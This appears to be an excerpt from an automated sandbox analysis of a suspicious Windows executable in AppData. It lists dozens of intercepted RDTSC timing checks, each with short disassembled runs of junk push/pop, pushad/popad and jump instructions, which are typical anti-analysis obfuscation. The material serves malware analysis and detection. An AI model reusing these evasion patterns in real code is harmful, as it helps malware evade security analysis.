Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549AE5 second address: 549AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549AF3 second address: 549AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549DF3 second address: 549DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549DFC second address: 549E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549E02 second address: 549E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54A0FA second address: 54A132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jmp 00007FBC9118B8B8h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FBC9118B8A6h 0x00000014 jmp 00007FBC9118B8B1h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54A28F second address: 54A293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 517EC1 second address: 517EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 517EC7 second address: 517ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 517ECF second address: 517ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54AAFE second address: 54AB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54AB06 second address: 54AB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 popad 0x00000008 pushad 0x00000009 jl 00007FBC9118B8ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54AB17 second address: 54AB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54AB1E second address: 54AB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54AB24 second address: 54AB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54AB2D second address: 54AB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBC9118B8A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54AC93 second address: 54ACDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FBC912593F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FBC91259402h 0x00000014 jmp 00007FBC91259405h 0x00000019 push ecx 0x0000001a jmp 00007FBC91259403h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54AE86 second address: 54AE8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54AE8C second address: 54AE9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC912593FDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54AFED second address: 54AFFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBC9118B8ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54B333 second address: 54B35E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBC91259404h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54B35E second address: 54B368 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBC9118B8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54DFB9 second address: 54DFBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54DFBF second address: 54DFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54DFC3 second address: 54DFC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54E5E2 second address: 54E5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54E5E6 second address: 54E5EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54E5EC second address: 54E5F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54E5F2 second address: 54E600 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54E600 second address: 54E638 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC9118B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jno 00007FBC9118B8ACh 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007FBC9118B8AAh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jns 00007FBC9118B8A6h 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54CF27 second address: 54CF2D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54CF2D second address: 54CF32 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54E73A second address: 54E74D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007FBC912593F6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54E74D second address: 54E753 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54E753 second address: 54E77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jbe 00007FBC912593FCh 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54E77C second address: 54E797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop eax 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007FBC9118B8A6h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54E797 second address: 54E7B2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBC912593F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBC912593FFh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 50C16B second address: 50C19B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B9h 0x00000007 jmp 00007FBC9118B8ACh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 555749 second address: 55574F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 555883 second address: 555888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 555888 second address: 5558B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007FBC912593F6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jmp 00007FBC91259402h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55610E second address: 556114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 556114 second address: 556120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 556120 second address: 556126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 556126 second address: 55612B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55612B second address: 55613B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBC9118B8B2h 0x00000008 jng 00007FBC9118B8A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55861A second address: 55865D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBC91259402h 0x00000008 jno 00007FBC91259402h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBC91259409h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 50DC3E second address: 50DC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 50DC47 second address: 50DC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 50DC4B second address: 50DC7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBC9118B8B1h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 50DC7C second address: 50DC82 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55BF6B second address: 55BF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBC9118B8AFh 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55C007 second address: 55C010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55C5FC second address: 55C61E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FBC9118B8ACh 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55CB94 second address: 55CB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55CCEA second address: 55CCF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55CE24 second address: 55CE36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FBC912593F6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55CE36 second address: 55CE4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55CE4E second address: 55CE69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC91259407h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55CE69 second address: 55CE6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55F0DA second address: 55F0F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55F0F6 second address: 55F0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55F0FD second address: 55F109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FBC912593F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55F109 second address: 55F10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 560846 second address: 560854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 562A0A second address: 562A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5627D1 second address: 5627D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5627D7 second address: 5627E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FBC9118B8A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5643D7 second address: 5643E1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBC912593F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5643E1 second address: 5643E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5643E7 second address: 5643ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56315B second address: 56315F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56315F second address: 563173 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBC912593F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 567F98 second address: 567FA9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBC9118B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 567FA9 second address: 567FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56854E second address: 568552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5693AF second address: 5693B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5693B3 second address: 5693C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FBC9118B8A6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5693C1 second address: 5693C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56943A second address: 56944C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jo 00007FBC9118B8BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56B508 second address: 56B51F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259403h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56B51F second address: 56B556 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jns 00007FBC9118B8ACh 0x0000000f push 00000000h 0x00000011 jmp 00007FBC9118B8AEh 0x00000016 push 00000000h 0x00000018 add edi, dword ptr [ebp+122D2B5Eh] 0x0000001e push eax 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 jp 00007FBC9118B8A6h 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56D7A1 second address: 56D7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56D7A6 second address: 56D806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FBC9118B8B3h 0x00000012 push 00000000h 0x00000014 pushad 0x00000015 jmp 00007FBC9118B8B1h 0x0000001a popad 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e cld 0x0000001f sub dword ptr [ebp+1247C20Ch], ecx 0x00000025 popad 0x00000026 jmp 00007FBC9118B8B1h 0x0000002b xchg eax, esi 0x0000002c pushad 0x0000002d jmp 00007FBC9118B8AAh 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5686B6 second address: 56876A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBC91259409h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FBC91259402h 0x00000012 mov edi, dword ptr [ebp+122D1C46h] 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov dword ptr [ebp+122D1EE8h], ecx 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FBC912593F8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov ebx, dword ptr [ebp+122D39ACh] 0x0000004c mov eax, dword ptr [ebp+122D02F1h] 0x00000052 jmp 00007FBC91259404h 0x00000057 push FFFFFFFFh 0x00000059 adc ebx, 11850BB3h 0x0000005f jo 00007FBC912593F9h 0x00000065 push esi 0x00000066 cmc 0x00000067 pop ebx 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FBC91259400h 0x00000070 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5695DD second address: 5695E7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBC9118B8ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56E88E second address: 56E8A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5695E7 second address: 5695F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
